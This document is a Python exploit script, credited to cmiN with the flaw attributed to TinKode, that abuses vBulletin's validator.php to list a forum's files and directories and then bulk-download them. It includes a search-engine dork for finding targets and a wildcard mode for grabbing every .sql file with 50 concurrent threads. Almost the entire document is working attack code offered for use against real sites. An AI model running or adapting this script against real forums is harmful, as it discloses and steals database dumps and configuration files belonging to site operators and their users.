#!/usr/bin/env python3
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    # "cls" exists only on Windows; every other platform clears with "clear".
    if os.name == "nt":
        clearing = "cls"
    else:
        clearing = "clear"
    os.system(clearing)
    print(logo) 
    args = sys.argv 
    if len(args) == 3 and args[1] in ("scan", "download"):
        try:
            print("Please wait...")
            if args[1] == "scan":
                extract_parse_save(args[2].strip("/"))
            elif args[1] == "download":
                download_data(args[2])
        except Exception as message:
            print("An error occurred: {}".format(message))
        except:
            # Anything not derived from Exception (e.g. KeyboardInterrupt).
            print("Unknown error.")
        else:
            print("Ready!")
    else:
        print(usage)
    input()  # pause so the console window stays open
 
 
def extract_parse_save(url):
    print("[+]Extracting content...")
    hurl = url + "/validator.php"
    with urllib.request.urlopen(hurl) as usock:
        source = usock.read().decode()
    print("[+]Finding token...")
    # The page embeds a call of the form validate('<token>');
    # slice out the string between the quotes.
    word = "validate('"
    source = source[source.index(word) + len(word):]
    value = source[:source.index("'")]
    print("[+]Obtaining paths...")
    hurl = url + "/validator.php?op={}".format(value)
    with urllib.request.urlopen(hurl) as usock:
        lastk, lastv = None, None
        dictionary = dict()
        for line in usock:
            line = line.decode()
            # Each entry's name sits inside <td>...</td> and its companion
            # value inside <strong>...</strong>; collect them as a pair.
            index = line.find("<td>")
            if index != -1:
                lastk = line[index + 4:line.index("</td>")].strip(" ")
            index = line.find("<strong>")
            if index != -1:
                lastv = line[index + 8:line.index("</strong>")].strip(" ")
            if lastk is not None and lastv is not None:
                # Tag each name with its extension so the report groups by type.
                index = lastk.rfind(".")
                if index in (-1, 0):
                    lastk = "[other] {}".format(lastk)
                else:
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk)
                dictionary[lastk] = lastv
                lastk, lastv = None, None
    print("[+]Organizing and saving paths...")
    # vBlogs.txt: first line is the base URL, then one sorted entry per line.
    with open("vBlogs.txt", "w") as fout:
        fout.write(url + "\n")
        for key in sorted(dictionary.keys()):
            fout.write("{} ({})\n".format(key, dictionary[key]))
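
# Illustration only: the markup and values below are hypothetical, not taken
# from any real host. Given a validator.php row along the lines of
#
#     <td> includes/config.php </td> ... <strong> OK </strong>
#
# extract_parse_save() would append a line such as
#
#     [php] includes/config.php (OK)
#
# to vBlogs.txt. download_data() below splits these lines on spaces, using the
# "[ext]" tag for wildcard matching and the second field as the request path.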
 
 
def download_data(files):
    print("[+]Searching and downloading files...")
    mthreads = 50  # cap on simultaneously running download threads
    with open("vBlogs.txt", "r") as fin:
        # The first line of vBlogs.txt holds the base URL saved by the scan.
        url = fin.readline().strip("\n")
        if files.find("*") == -1:
            # Exact file name: fetch it directly from the forum root.
            hurl = url + "/" + files.strip("/")
            Download(hurl).start()
        else:
            # Wildcard such as *.sql: fetch every entry tagged with that extension.
            ext = files[files.rindex(".") + 1:]
            for line in fin:
                pieces = line.strip("\n").split(" ")
                if pieces[0] == "[{}]".format(ext):
                    upath = pieces[1]
                    hurl = url + "/" + upath.strip("/")
                    # Crude throttle: busy-wait until a thread slot frees up.
                    while threading.active_count() > mthreads:
                        pass
                    Download(hurl).start()
    # Block until every download thread has finished.
    while threading.active_count() > 1:
        pass
 
 
class Download(threading.Thread):
    """Downloads a single URL and saves it under its base file name."""

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        try:
            with urllib.request.urlopen(self.url) as usock:
                data = usock.read()
                # Name the local file after the last component of the final
                # (possibly redirected) URL's path.
                uparser = urllib.parse.urlparse(usock.geturl())
                fname = uparser.path.split("/")[-1]
                with open(fname, "wb") as fout:
                    fout.write(data)
        except Exception:
            # Unreachable or unreadable files are skipped silently.
            pass
 
 
if __name__ == "__main__": 
    main()
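
# Example session (host name made up for illustration, matching the usage text
# above):
#
#   $ python3 vbfd.py scan http://www.example.com/vB_folder
#   $ python3 vbfd.py download *.sql
#
# The first command writes vBlogs.txt next to the script; the second reads it
# back and fetches every entry tagged [sql] into the current directory, with
# the number of concurrent download threads throttled to mthreads (50). On
# POSIX shells, quote the pattern ('*.sql') so the shell does not expand it.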

